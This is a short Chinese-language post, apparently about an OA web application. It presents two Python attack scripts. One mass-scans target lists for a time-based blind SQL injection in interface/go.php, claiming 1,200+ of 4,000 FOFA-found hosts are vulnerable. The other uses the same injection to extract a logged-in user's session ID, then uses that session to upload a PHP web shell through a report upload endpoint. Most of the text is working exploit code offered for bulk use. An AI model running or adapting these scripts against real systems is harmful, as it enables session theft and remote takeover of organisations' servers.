目录
批量检测:
稍微改动下,getshell脚本:
python写的,fofa 4000目标检测出来1200+存在:
批量检测:
# -*- coding: utf-8 -*-import requests,sysimport argparseimport urllib3import sslimport vthreadurllib3.disable_warnings()ssl._create_default_https_context = ssl._create_unverified_contextheaders = {"Content-Type":"application/x-www-form-urlencoded"}session = ""def isLogin(host):try:r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)return Trueexcept requests.exceptions.ReadTimeout:return False@vthread.pool(10)def GetSession(url):global sessionif isLogin(url):print("存在用户登录......")with open('純在漏洞.txt',"a") as a: #设置文件对象str = a.write(url + "\n")else:print("没有用户登录")if __name__ == "__main__":f = open(input()) lines = f.readlines()for line in lines:line = line.strip()if "http" not in line:line = "http://" + lineGetSession(line)
稍微改动下,getshell脚本:
# -*- coding: utf-8 -*-import requests,sysimport argparseimport urllib3import sslurllib3.disable_warnings()ssl._create_default_https_context = ssl._create_unverified_contextheaders = {"Content-Type":"application/x-www-form-urlencoded"}session = ""def isLogin(host):try:r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)return Trueexcept requests.exceptions.ReadTimeout:return Falsedef GetSession(url):global sessionif isLogin(url):print("存在用户登录......")for i in range(27):for x in range(48,128):sql = "{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if(ascii(mid((select sid from user_online limit 0%252c1)%252c{mid}%252c1))={ascii}%252csleep(20)%252c1)+%23%25%252727".format(url=url, mid=i, ascii=x)try:r = requests.get(url = sql,timeout=18,headers=headers)except requests.exceptions.ReadTimeout:print("编码:"+str(x))print("sql:"+sql)session += chr(x)breakprint("session:"+session)print("--------------------------------------------------------")print("OK:",session)else:print("没有用户登录")def upload(url,file):if len(session) < 20:print("session不完整,请重新获取....")returnwith open(file,"rb") as file:print("开始上传文件...")file = [('FILE1',('shell.php. ',file,'image/png'))]r = requests.post(url="{url}/general/reportshop/utils/upload.php?action=upload&filetype=xls".format(url=url),headers={"cookie":"PHPSESSID="+session},files=file)if "true" in r.text:print("上传成功,shell地址:8750端口 \\attachment\\reportshop\\templates\\shell.php")else:print(r.text)if __name__ == "__main__":Usage = 'python3 1.py -u url -f file'parser = argparse.ArgumentParser(description = Usage)parser.add_argument('-u', '--url', type=str, required=True, help='e.g. The website home page. 172.16.203.147')parser.add_argument('-f', '--file', type=str, required=True, help='Path to ')args = parser.parse_args()url = args.urlfile = args.fileGetSession(url)upload(url,file)